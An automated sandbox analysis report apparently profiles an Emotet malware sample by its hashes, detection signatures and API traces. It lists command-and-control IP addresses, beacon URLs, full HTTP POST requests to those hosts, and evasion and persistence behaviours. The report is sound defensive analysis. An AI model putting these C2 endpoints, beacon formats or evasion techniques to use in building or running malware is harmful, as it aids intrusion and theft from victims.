Analysis Report FsWcL0gpTv

Overview

General Information

Sample Name: FsWcL0gpTv (renamed file extension from none to exe)
Analysis ID: 317598
MD5: d1cef4c90a48a4788d9ce4208ee769cb
SHA1: 5c17f1665881c62c9cee7bded2df3c2ac557cd38
SHA256: eabe9e59682457968198f818f0d2d280d397a001d7fee58a2de6c9acc0d2651a

Most interesting Screenshot:

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: FsWcL0gpTv.exe Virustotal: Detection: 61%
Source: FsWcL0gpTv.exe Metadefender: Detection: 45%
Source: FsWcL0gpTv.exe ReversingLabs: Detection: 70%
Machine Learning detection for sample
Source: FsWcL0gpTv.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap, 3_2_02A72290
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 3_2_02A72650
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A71FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash, 3_2_02A71FB0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 3_2_02A738F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49707 -> 102.182.145.130:80
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49723 -> 173.173.254.105:80
Source: Traffic Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49734 -> 64.207.182.168:8080
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49737 -> 51.89.199.141:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 64.207.182.168:8080
Source: global traffic TCP traffic: 192.168.2.5:49737 -> 51.89.199.141:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 102.182.145.130 102.182.145.130
Source: Joe Sandbox View IP Address: 64.207.182.168 64.207.182.168
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AfrihostZA AfrihostZA
Source: Joe Sandbox View ASN Name: GO-DADDY-COM-LLCUS GO-DADDY-COM-LLCUS
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 102.182.145.130:80
Source: global traffic TCP traffic: 192.168.2.5:49723 -> 173.173.254.105:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 51.89.199.141/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------wo3M7HGlGf1KUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.199.141:8080Content-Length: 4580Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: unknown TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW, 3_2_02A729B0
Source: unknown HTTP traffic detected: POST /hdXW/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 64.207.182.168/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------LoZ3XEj1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 64.207.182.168:8080Content-Length: 4612Cache-Control: no-cache
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/X-
Source: WpPortingLibrary.exe, 00000003.00000003.361330882.000000000325E000.00000004.00000001.sdmp String found in binary or memory: http://173.173.254.105/LN19JoV6Jo34Ba/UOjzG3KqtwalQ/Gy4EZLufQaYY3rmRrq0/Su721nFGl8jnm9/v1RyG4lzB/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/
Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/.
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/T)
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/d(
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/O
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/l
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp String found in binary or memory: http://64.207.182.168:8080/hdXW/ll
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000004.00000002.501376722.0000017996C00000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000004.00000002.503056387.0000017997060000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000009.00000002.304660388.00000189FAC13000.00000004.00000001.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.304362631.00000189FAC63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000002.304715723.00000189FAC3A000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500809704.0000000002A71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.FsWcL0gpTv.exe.2ef0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.WpPortingLibrary.exe.2a70000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 3_2_02A72650

System Summary:

Creates files inside the system directory
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File created: C:\Windows\SysWOW64\offreg\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File deleted: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF8240 0_2_02EF8240
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3BA0 0_2_02EF3BA0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF1C70 0_2_02EF1C70
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF7740 0_2_02EF7740
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3F20 0_2_02EF3F20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF6530 0_2_02EF6530
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3D10 0_2_02EF3D10
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E792DE 0_2_02E792DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E75ABE 0_2_02E75ABE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7573E 0_2_02E7573E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E780CE 0_2_02E780CE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E758AE 0_2_02E758AE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E87069 0_2_02E87069
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7380E 0_2_02E7380E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E79DDE 0_2_02E79DDE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A78240 3_2_02A78240
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73BA0 3_2_02A73BA0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73F20 3_2_02A73F20
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A76530 3_2_02A76530
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73D10 3_2_02A73D10
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A71C70 3_2_02A71C70
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A77740 3_2_02A77740
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F5ABE 3_2_029F5ABE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F92DE 3_2_029F92DE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F573E 3_2_029F573E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F58AE 3_2_029F58AE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F80CE 3_2_029F80CE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F380E 3_2_029F380E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A07069 3_2_02A07069
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F9DDE 3_2_029F9DDE
Sample file is different than original file name gathered from version info
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp Binary or memory string: originalfilename vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239187518.0000000003310000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs FsWcL0gpTv.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: classification engine Classification label: mal80.troj.evad.winEXE@16/5@0/5
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle, 0_2_02EF87D0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A74CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification, 3_2_02A74CB0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5284:120:WilError_01
Source: FsWcL0gpTv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: FsWcL0gpTv.exe Virustotal: Detection: 61%
Source: FsWcL0gpTv.exe Metadefender: Detection: 45%
Source: FsWcL0gpTv.exe ReversingLabs: Detection: 70%
Source: unknown Process created: C:\Users\user\Desktop\FsWcL0gpTv.exe 'C:\Users\user\Desktop\FsWcL0gpTv.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Process created: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02EB1030
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5DF0 push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02EF5DF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5EF0 push ecx; mov dword ptr [esp], 0000669Ch 0_2_02EF5EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5DC0 push ecx; mov dword ptr [esp], 000089FAh 0_2_02EF5DC1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5CD0 push ecx; mov dword ptr [esp], 00001CE1h 0_2_02EF5CD1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5EA0 push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02EF5EA1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D90 push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02EF5D91
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D50 push ecx; mov dword ptr [esp], 00006847h 0_2_02EF5D51
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D20 push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02EF5D21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5F20 push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02EF5F21
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5D00 push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02EF5D01
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF5E10 push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02EF5E11
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77ABE push ecx; mov dword ptr [esp], 0000E36Ch 0_2_02E77ABF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77A8E push ecx; mov dword ptr [esp], 0000669Ch 0_2_02E77A8F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E93E9C push ebx; iretd 0_2_02E93EAF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E93E9C push FFFFFF95h; iretd 0_2_02E93EF1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E77A3E push ecx; mov dword ptr [esp], 0000A3FDh 0_2_02E77A3F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E778EE push ecx; mov dword ptr [esp], 00006847h 0_2_02E778EF
